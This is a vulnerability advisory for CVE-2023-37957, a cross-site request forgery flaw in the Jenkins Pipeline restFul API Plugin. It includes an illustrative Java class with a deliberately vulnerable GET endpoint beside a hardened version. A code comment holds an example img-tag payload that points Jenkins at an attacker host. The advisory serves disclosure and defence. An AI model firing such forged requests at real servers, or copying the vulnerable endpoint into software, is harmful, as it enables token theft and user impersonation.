CVE-2023-37957 – io.jenkins.plugins:pipeline-restful-api
Package
Manager: maven
Name: io.jenkins.plugins:pipeline-restful-api
Vulnerable Version: >=0 <=0.11
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.0007 (percentile 0.2196)
Details
Jenkins Pipeline restFul API Plugin vulnerable to Cross Site Request Forgery (CSRF)
Jenkins Pipeline restFul API Plugin 0.11 and earlier does not require POST requests for an HTTP endpoint, so the endpoint's side effect can be triggered by a plain GET. Jenkins validates its CSRF crumb only on POST requests, so any page a victim opens while logged in to Jenkins can fire the request (for example through an image or script tag pointing at the endpoint) and the browser attaches the victim's session cookie. This cross-site request forgery (CSRF) vulnerability allows attackers to have Jenkins connect to an attacker-specified URL, capturing a newly generated JCLI token that allows impersonating the victim.
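The following is an added illustration of the endpoint pattern behind CWE-352 in a Jenkins plugin; it is not the Pipeline restFul API Plugin's own source, and the package, class, URL names and the "url" parameter are made up for the example. It shows a Stapler-bound endpoint that accepts GET (the vulnerable shape this advisory describes) next to the hardened form that requires POST and a permission check.

```java
// Added illustrative example (not the plugin's source). Package, class and URL names are made up.
package example.csrf;

import hudson.Extension;
import hudson.model.RootAction;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.StaplerResponse;
import org.kohsuke.stapler.interceptor.RequirePOST;

import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.net.URL;

/**
 * Stapler binds doConnect() to .../example-csrf/connect and
 * doConnectSafe() to .../example-csrf/connectSafe. Both take a "url"
 * query parameter and record it as the target Jenkins would connect to.
 */
@Extension
public class ExampleCsrfAction implements RootAction {

    private volatile String lastTarget;   // stands in for the real side effect

    @Override public String getIconFileName() { return null; } // no sidebar entry
    @Override public String getDisplayName() { return "Example CSRF demo"; }
    @Override public String getUrlName() { return "example-csrf"; }

    /**
     * VULNERABLE pattern: no @RequirePOST, so a plain GET reaches it. Jenkins
     * checks the CSRF crumb only on POST, so a page the victim opens while
     * logged in can fire
     *   <img src="https://jenkins.example/example-csrf/connect?url=https://attacker.example/">
     * and the browser attaches the victim's session cookie automatically.
     */
    public void doConnect(@QueryParameter String url, StaplerResponse rsp) throws IOException {
        recordTarget(url);
        rsp.setStatus(HttpServletResponse.SC_NO_CONTENT);
    }

    /**
     * HARDENED pattern: @RequirePOST makes Stapler reject anything but POST
     * (HTTP 405), and a POST must carry a valid crumb, which a cross-site page
     * cannot read. The permission check is a second, independent layer so a
     * forged request from a low-privilege session still cannot reach the
     * side effect.
     */
    @RequirePOST
    public void doConnectSafe(@QueryParameter String url, StaplerResponse rsp) throws IOException {
        Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        recordTarget(url);
        rsp.setStatus(HttpServletResponse.SC_NO_CONTENT);
    }

    private void recordTarget(String url) throws IOException {
        // Parse first so malformed input fails before any side effect;
        // a real plugin would open the outbound connection here.
        lastTarget = new URL(url).toExternalForm();
    }

    public String getLastTarget() { return lastTarget; }
}
```

The quick check a reviewer can run against any suspect endpoint is a GET with curl: the vulnerable shape answers 2xx and performs the action, while a @RequirePOST endpoint answers 405 without doing anything. Stapler's `@org.kohsuke.stapler.verb.POST` annotation gives the same method restriction as `@RequirePOST`; either one is what a fix for an advisory of this kind adds to the affected handler.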
Metadata
Created: 2023-07-12T18:30:38Z
Modified: 2023-07-12T22:31:55Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hmw6-r547-42fr/GHSA-hmw6-r547-42fr.json
CWE IDs: ["CWE-352"]
Alternative ID: GHSA-hmw6-r547-42fr
Finding: F007
Auto approve: 1